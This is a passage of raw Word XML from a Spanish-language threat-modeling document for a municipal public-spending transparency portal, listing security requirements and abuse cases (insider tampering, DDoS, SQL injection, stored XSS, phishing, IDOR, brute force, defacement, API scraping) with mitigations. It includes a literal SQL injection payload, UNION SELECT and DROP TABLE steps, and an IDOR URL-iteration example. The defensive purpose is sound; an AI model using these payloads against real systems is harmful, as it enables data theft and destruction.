            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="636376A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No Funcional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79CCEBF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Política de Contraseñas y Bloqueo de Cuenta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45846A9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Contraseñas mínimo 12 caracteres con complejidad; bloqueo temporal tras 5 intentos fallidos; notificación por e-mail.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03FB292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Mitiga ataques de fuerza bruta y credential stuffing contra cuentas de funcionarios.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="5F3DED8A" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="62700C3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RS-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7F90882B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es-CO"/>
              </w:rPr>
              <w:t>Funcional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="66C4C7B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Alertas SIEM en Tiempo Real</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="262DA4B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El SIEM debe alertar en menos de 60 s ante anomalías: accesos fuera de horario, volumen inusual de descargas, cambios masivos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="401420D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18"/>
                <w:lang w:val="es-CO"/>
              </w:rPr>
              <w:t>Permite respuesta temprana ante incidentes y reduce el MTTD (tiempo medio de detección).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65CEC1DD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47F0295B" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="005765CC" w:rsidRDefault="004C1787">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc240017709"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>3. Casos de Abuso</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="636F5B61" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="00307BF1" w:rsidRDefault="004C1787" w:rsidP="00B03C1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Se identifican 10 casos de abuso pensados desde la perspectiva del atacante (threat modeling ofensivo). Cada caso describe el atacante, el objetivo del ataque, las acciones realizadas, el impacto potencial y las contramedidas de mitigación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4211717A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323B3BF9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4" w:name="_Toc240017710"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CA-01 Manipulación de Registros Presupuestales por Funcionario Interno</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="25789374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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBD945F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CA-01 — Manipulación de Registros Presupuestales por Funcionario Interno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31AF2A45" w14:textId="77777777" w:rsidTr="00307BF1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0CF1C214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CRÍTICO | Probabilidad: Alta | Impacto: Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="055134A0" w14:textId="77777777" w:rsidTr="00307BF1">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27F56AF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funcionario municipal con rol de Editor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D154DA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Alterar montos de contratos públicos para ocultar una desviación de fondos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="175C84A4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7453"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="1C183088" w14:textId="77777777" w:rsidTr="005765CC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535948F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C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="235201B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Inicia sesión con credenciales legítimas.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Edita registros de contratos adjudicados cambiando montos y beneficiarios.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Intenta borrar el historial de cambios si el sistema lo permite.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="5A268590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670A9896" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="005765CC" w:rsidRDefault="004C1787">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b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1C8CA1C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Pérdida de integridad de datos públicos; desinformación ciudadana; encubrimiento de corrupción y posibles sanciones legales para el municipio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="1059AEA1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12DEC95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07DEFB4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Log de auditoría append-only con firma digital; ningún usuario puede borrar entradas.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Workflow de aprobación dual para cambios en contratos superiores a un umbral definido.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Alertas automáticas al supervisor cuando se detecta modificación fuera de rango estadístico.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B8D0AF0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4CE978B8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5" w:name="_Toc240017711"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>CA-02 Ataque DDoS durante Rendición de Cuentas Electoral</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="33C91B63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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452C780F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CA-02 — Ataque DDoS durante Rendición de Cuentas Electoral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5C52F874" w14:textId="77777777" w:rsidTr="001C5B75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5606C225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CRÍTICO | Probabilidad: Alta | Impacto: Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="1EBD1C37" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="7612735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Grupo político adversario o actor externo con acceso a botnet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="3CE0FFAB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Silenciar la plataforma en momentos de alta visibilidad pública (período electoral).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57F01C55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1"/>
        <w:gridCol w:w="7455"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="36D783D8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317BC51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7445DA6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Coordina botnet para enviar millones de solicitudes HTTP al portal.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Satura los endpoints de búsqueda y descarga de informes con mayor tráfico.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Usa IPs rotativas y proxies para evadir bloqueos simples por IP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="1C0D203F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04E9CFC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18D41A9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Indisponibilidad del servicio en período crítico; daño a la confianza pública; silencio informativo que beneficia a actores corruptos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="47267694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3E9AE15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56C4636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CDN con protección DDoS integrada (Cloudflare / AWS Shield Advanced).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Rate limiting por IP, token y geolocalización con respuesta automática.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Auto-scaling y arquitectura serverless para absorber picos legítimos de tráfico.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="299FF7E4" w14:textId="3AA7417D" w:rsidR="00677A69" w:rsidRDefault="00677A69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D8833F9" w14:textId="2D3EAFF3" w:rsidR="00B03C14" w:rsidRDefault="00B03C14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F0C49C" w14:textId="27B36B84" w:rsidR="00B03C14" w:rsidRDefault="00B03C14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29306E70" w14:textId="77777777" w:rsidR="00B03C14" w:rsidRPr="005765CC" w:rsidRDefault="00B03C14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F59D6C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6" w:name="_Toc240017712"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CA-03 Inyección SQL en Buscador de Contratos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="01A52FE6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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B412E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CA-03 — Inyección SQL en Buscador de Contratos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2D199407" w14:textId="77777777" w:rsidTr="001C5B75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4B704526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ALTO  |  Probabilidad: Media  |  Impacto: Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="16C52B82" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="4950A67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Atacante externo con conocimiento técnico (pentester malicioso, competidor).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="360FCA0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Extraer datos confidenciales de la base de datos o eliminar registros históricos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2522D4F9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0"/>
        <w:gridCol w:w="7456"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="7BD643C8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4451178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7600129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Ingresa payloads SQL en el campo de búsqueda: ' OR '1'='1'--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Usa UNION SELECT para extraer tablas internas (usuarios, credenciales).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Intenta DROP TABLE para destruir el historial de contratos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="73057791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65F3458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40BECE8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Exposición de datos internos y credenciales; destrucción de registros históricos; pérdida irreversible de información pública.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="114E19D5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33C8D8C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3B323CA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Usar ORM con consultas parametrizadas; prohibir SQL dinámico.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WAF (Web Application Firewall) con reglas OWASP Core Rule Set.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Principio de mínimo privilegio: el usuario de BD solo tiene SELECT/INSERT en tablas necesarias.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C41AC35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7E78776B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7" w:name="_Toc240017713"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>CA-04 XSS Persistente en Panel de Comentarios Ciudadanos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="6E8A41F9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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4911E245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CA-04 — XSS Persistente en Panel de Comentarios Ciudadanos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15A8EC0F" w14:textId="77777777" w:rsidTr="001C5B75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4E2251CC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ALTO  |  Probabilidad: Media  |  Impacto: Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="2944340E" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="0C74B2F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Ciudadano malintencionado o actor político con cuenta básica.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="7402C4C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Robar sesiones de administradores o inyectar desinformación visual en la plataforma.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="388DB941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7453"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="682685EE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3008C6F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5BC6794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Publica un comentario con script malicioso embebido en el campo de texto.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El script se ejecuta cuando un administrador visualiza el comentario desde el panel.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Exfiltra el token de sesión del administrador a un servidor controlado por el atacante.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="1155583A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28ECFB1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26687B7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Toma de control de cuenta de administrador; desinformación masiva visible a ciudadanos; posible defacement del portal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="3DEBB223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1226744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68486F8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Sanitización de salida HTML con biblioteca DOMPurify y política Content-Security-Policy estricta.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Tokens de sesión con flags HttpOnly y Secure; inaccesibles desde JavaScript.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Moderación de comentarios antes de su publicación pública.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="161DBA9D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0D8CE0F8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8" w:name="_Toc240017714"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>CA-05 Suplantación de Identidad de Funcionario (Phishing)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="709F4BF4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6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A31C2E2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CA-05 — Suplantación de Identidad de Funcionario (Phishing)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01FB6621" w14:textId="77777777" w:rsidTr="001C5B75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520E19AA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CRÍTICO | Probabilidad: Alta | Impacto: Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="3F128EE7" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="2489AB8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lastRenderedPageBreak/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Atacante externo que compromete el correo corporativo de un funcionario.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="5085FB9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Publicar datos falsos haciéndose pasar por un funcionario autorizado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4600F7BA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454"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="2C33F4C7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2E2C832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7CB0F85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Envía e-mail de spear-phishing al funcionario para robar sus credenciales.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Accede al panel con las credenciales robadas desde una IP diferente.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Publica contratos falsos o altera montos del presupuesto antes de ser detectado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="1D9D2690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604241B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68E112D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Datos falsos publicados como oficiales; pérdida de credibilidad institucional; crisis de confianza ciudadana y posible manipulación de mercados.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="7A02EE71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30DD355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3153E19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MFA obligatorio (TOTP o FIDO2): credenciales robadas no bastan para acceder.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Análisis de comportamiento: login desde IP/país inusual activa bloqueo y notificación.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Capacitación anti-phishing obligatoria y simulacros periódicos para funcionarios.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D825DE9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6D598D08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1F84607F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9" w:name="_Toc240017715"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>CA-06 Acceso No Autorizado a Reportes Confidenciales (IDOR)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="3476B3E4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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DFFDCE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CA-06 — Acceso No Autorizado a Reportes Confidenciales (IDOR)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510D6F5D" w14:textId="77777777" w:rsidTr="00307BF1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5418A8B8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ALTO  |  Probabilidad: Media  |  Impacto: Medio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="64ABFC9F" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="0B76186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Ciudadano, periodista o actor con acceso básico a la plataforma.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="4C93FF0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Acceder a informes de auditoría internos antes de su publicación oficial.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35073F5F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6"/>
        <w:gridCol w:w="7480"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="3433CB5F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7216F0A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751B525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Observa la URL de un documento: /reportes/2026/informe_123.pdf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Modifica el ID secuencial: /reportes/2026/informe_001.pdf (aún no publicado).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Descarga documentos confidenciales iterando IDs con un script automatizado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="57739E79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420DD2A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2757340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Filtración de datos de auditoría preliminares; uso político de información sin contexto; violación del proceso institucional de revisión.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="5BA328B1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09936F1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781869E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UUIDs no predecibles en lugar de IDs secuenciales para todos los recursos.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Verificación explícita de permisos en cada solicitud de recurso (no confiar en oscuridad).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Logs de acceso a documentos sensibles con alertas ante patrones de iteración.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D5CF8A0" w14:textId="77777777" w:rsidR="00307BF1" w:rsidRDefault="00307BF1">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12BAE24D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0" w:name="_Toc240017716"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>CA-07 Fuerza Bruta sobre Cuentas de Auditores</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="26886516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8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599AD0E9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CA-07 — Fuerza Bruta sobre Cuentas de Auditores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6B32CDBF" w14:textId="77777777" w:rsidTr="00307BF1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234D6545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ALTO  |  Probabilidad: Alta  |  Impacto: Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="49B37E75" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="170C15B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Atacante automatizado (script/bot) o actor con lista de credenciales filtradas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="45AAEF8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Obtener acceso privilegiado mediante ataque de diccionario o credential stuffing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="060730BD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5"/>
        <w:gridCol w:w="7451"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="5DC0DC07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5CE57B2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lastRenderedPageBreak/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6AB285B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Descarga listas de contraseñas comunes (rockyou.txt, breach databases).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Ataca el endpoint de login con miles de combinaciones por minuto.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Prueba credential stuffing usando brechas de datos de otras plataformas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="02198A25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4AC5DFD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242A33F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Compromiso de cuenta de auditor; acceso a datos internos no publicados; posibilidad de manipular o eliminar registros.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="2582D3E5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28D54C0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19D1ED2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Bloqueo temporal de IP y de cuenta tras 5 intentos fallidos; desbloqueo con CAPTCHA.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Notificación inmediata al usuario por e-mail ante intentos fallidos repetidos.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MFA como segunda barrera aunque la contraseña haya sido comprometida.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2707C7EB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708D4009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1" w:name="_Toc240017717"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>CA-08 Defacement del Portal Público</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="75DE85EA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9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C44A88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CA-08 — Defacement del Portal Público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35E9B1C5" w14:textId="77777777" w:rsidTr="00307BF1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296C2C3C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ALTO  |  Probabilidad: Media  |  Impacto: Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="51B11A22" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="6155A05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Hacktivista o grupo de presión política con capacidades técnicas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="2CF5184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Alterar la apariencia del portal para difundir mensajes de desinformación.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="124468FD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454"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="53408589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657C753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72A8DD5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Explota una vulnerabilidad en el CMS o en una dependencia desactualizada.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Reemplaza la página principal con contenido político falso o difamatorio.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Deja mensaje o malware para afectar a los visitantes del portal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="648DAB10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6D4FA95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241F6C6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Daño reputacional severo al municipio; pérdida de confianza institucional; posible infección de equipos de ciudadanos visitantes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="0E671770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29E87F3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5766661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WAF + IDS/IPS con reglas de detección de modificación de archivos en tiempo real.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Monitoreo de integridad de archivos (AIDE/Tripwire) con alerta inmediata.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Pipeline CI/CD con despliegues inmutables: ningún archivo es modificable en producción directamente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23FAD511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68CCBB8C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1143E9EA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2" w:name="_Toc240017718"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>CA-09 Exfiltración Masiva de Datos vía API sin Restricción</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="757179BD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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D584FA8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CA-09 — Exfiltración Masiva de Datos vía API sin Restricción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48B406E5" w14:textId="77777777" w:rsidTr="00307BF1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5FF4AD95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MEDIO  |  Probabilidad: Alta  |  Impacto: Medio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="423ECE3E" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="3D7949E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Competidor, lobbyist o actor con interés económico y token de API legítimo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
